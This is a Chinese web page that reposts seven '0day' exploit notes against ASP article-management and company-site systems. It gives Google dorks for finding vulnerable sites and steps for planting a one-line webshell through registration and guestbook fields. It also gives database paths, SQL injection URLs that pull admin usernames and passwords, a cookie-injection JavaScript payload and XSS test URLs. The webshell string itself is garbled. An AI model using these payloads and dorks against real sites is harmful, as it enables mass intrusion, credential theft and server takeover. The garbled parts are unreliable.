欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>大榕树网络文章管理系统0day

大榕树网络文章管理系统0day

2023-11-18 08:02:34 收藏本文 下载本文

“jianghua”通过精心收集,向本站投稿了7篇大榕树网络文章管理系统0day,下面是小编整理后的大榕树网络文章管理系统0day,欢迎大家阅读分享借鉴,希望对大家有所帮助。

大榕树网络文章管理系统0day

篇1:大榕树网络文章管理系统0day

大榕树网络文章管理系统 Ver 3.0 Build 090602 用户注册处过滤不严 可插入一句话

利用:Google:inurl:ArtClaShow.asp?cid  ( 搜索inurl:ArtClaShow.asp?cid获得大约1,170条查询结果,以下是第1-10条)

打开网页,找到注册新用户 或者直接跳到UserReg.asp页面,在用户介绍处插入一句话 ┼}诞整超∨≡┩ ,其他按要求输入

如果看到注册成功,等待管理员审核,不用管,连接数据库即可,

大榕树网络文章管理系统0day

貌似现在流行这样插。密码 a

数据库地址:data/admin_article.asp

篇2:大榕树网络文章管理系统Ver 3.0 0day

用户注册处过滤不严,可插入一句话

利用:

Google:inurl:ArtClaShow.asp?cid

打开网页,找到注册新用户,或者直接跳到UserReg.asp页面,

在用户介绍处插入一句话 ┼}诞整超∨≡┩ ,其他按要求输入

如果看到注册成功,等待管理员审核,不用管,连接数据库即可.貌似现在流行这样插.

密码a,数据库地址:data/admin_article.asp

篇3:老Y文章管理系统注射0day

幻泉[B.S.N]  防线

漏洞等级:中等

漏洞说明:

漏洞出现在js.asp中,我们首先看源代码,

Code:

If CheckStr(Request(“ClassNo”)) “” then

ClassNo = split(CheckStr(Request(“ClassNo”)),“|”)

'这里是获取变量利用checkstr过滤,但是感觉好像没起作用。然后分成数组

on error resume next

NClassID = LaoYRequest(ClassNo(0))

NClassID1 = LaoYRequest(ClassNo(1))

'获取数组1,与数组2进行整形过滤。这里没有漏洞

End if

num = LaoYRequest(request.querystring(“num”))'这里num必须>=1

.......

set rs=server.createObject(“Adodb.recordset”)

sql = “Select top ”& num &“ ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0”

If NclassID“” and NclassID1=“” then

If Yao_MyID(NclassID)=“0” then

SQL=SQL&“ and ClassID=”&NclassID&“”

else

MyID = Replace(“”&Yao_MyID(NclassID)&“”,“|”,“,”)

SQL=SQL&“ and ClassID in (”&MyID&“)”

End if

elseif NclassID“” and NclassID1“” then

MyID = Replace(“”&Request(“ClassNo”)&“”,“|”,“,”)

SQL=SQL&“ and ClassID in (”&MyID&“)”

'这里出现的问题classno并没做其他过滤就写入到查询

End if

select case topType

case “new” sql=sql&“ order by DateAndTime desc,ID desc”

case “hot” sql=sql&“ order by hits desc,ID desc”

case “IsHot” sql=sql&“ and IsHot = 1 order by ID desc”

end select

set rs = conn.execute(sql)

if rs.bof and rs.eof then

str=str+“没有符合条件的文章”

........

-------------------------------

function.asp

Code:

function CheckStr(str)

CheckStr=replace(replace(replace(replace(str,“<”,“<”),“>”,“>”),chr(13),“”),“ ”,“”)

CheckStr=replace(replace(replace(replace(CheckStr,“'”,“”),“and”,“”),“insert”,“”),“set”,“”)

CheckStr=replace(replace(replace(replace(CheckStr,“select”,“”),“update”,“”),“delete”,“”),chr(34),“”)

CheckStr=replace(replace(replace(replace(replace(CheckStr,“*”,“”),“=”,“”),“or”,“”),“mid”,“”),“count”,“”)

end function

利用代码:

js.asp?num=1&ClassNo=1|1|1[SQL]

js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 ####获取密码代码

备注:本漏洞在2.4版本测试 站长站下载地址down.chinaz.com/soft/23126.htm

篇4:娱大妈文章管理系统YM1.0版0day

んㄗ葑Mi

娱大妈文章管理系统YM1.0版用户留言处过滤不严,数据库未作任何处理,可以插入一句话,迅速拿下Shell,

本来不想看这套程序的,刚准备删除时,找了个关键字Google 了一下,发现该系统有海量用户,后来简单测试了一下,均可拿下,

Google:inurl:lunshow.asp?pid     inurl:/js/lunshow.asp?pid      后来在测试时发现第一个关键字大多数是娱大妈的,第二个包含了部分c9的用户,不过通杀。

打开网页,直接跳到/guest/index.asp页面,留言内容为经典的一句话 ┼}诞整超∨≡┩ 数据库地址为 /db/%23%20db.asa,连接即可。

篇5:烈火文章后台管理系统V2.1 0day漏洞预警

烈火文章后台管理系统采用二级分类,界面简洁大方,功能简单易用,可远程自动上传图片

删除文章后,文章相关图片也一并删除减少垃圾文件的存在,

首先打开article.asp见如此语句

<%

set rs=conn.execute(“select * from article where id=”&request(“id”))(完全用request接收)

%>

■ <%=rs(“classname”)%>>

<%=rs(“title”)%>

随即看上内容

直接打开Check_SqlIn.asp

<%

'SQL通用防注入程序,只需要在conn.asp之类的打开数据库文件之前引用这个页面即可

dim sql_injdata

SQL_injdata =“'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare”

SQL_inj = split(SQL_Injdata,“|”)

If Request.QueryString“” Then

For Each SQL_Get In Request.QueryString

For SQL_Data=0 To Ubound(SQL_inj)

if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then

Response.Write “”

Response.end

end if

next

Next

End If

If Request.Form“” Then

For Each Sql_Post In Request.Form

For SQL_Data=0 To Ubound(SQL_inj)

if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then

Response.Write “”

Response.end

end if

next

next

end if

%>

很明显只是过滤get和post

存在cookies注入

付上exp

javascript.:alert(document.cookie=“id=”+escape(“95 and 1=2 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin”));

后台/admin/admin_login.asp

By:暗月式

篇6:米号吧文章管理系统跨站0day漏洞漏洞预警

多处跨站漏洞,影响版本:ZipWrangler 1.20

测试代码:

127.0.0.1/index.asp?forumID=2&subclassID=1&act=1&classicID=1>“>&page=1

127.0.0.1/index.asp?forumID=2&subclassID=1&act=1>”>&classicID=1&page=1

127.0.0.1/index.asp?forumID=2&subclassID=1>“>&act=1&classicID=1&page=1

127.0.0.1/ssb.asp?forumID=1&subclassID=1>”>&act=1&classicID=1&page=1

篇7:尘月网络企业网站智能管理系统0day利用程序

漏洞报告:

www.jshell.cn/logview.asp?id=81

Google关键字:inurl:/Web-GuestView.asp

测试方法:

127.0.0.1/Company.asp?%69d=7%20or%201=2%20un%69on%20s%65lect%201,username,password,4,5,6,7,8%20fr%6Fm%20admin

【大榕树网络文章管理系统0day】相关文章:

1.种猪场健康养殖网络管理系统的研制

2.合同管理系统

3.管理系统心得体会

4.网络传输系统填空题

5.畅谈网络终端系统

6.网络管理自查报告

7.网络管理研究

8.学籍管理系统心得体会

9.计量检测管理系统

10.客户管理系统论文

下载word文档
《大榕树网络文章管理系统0day.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

  • 返回顶部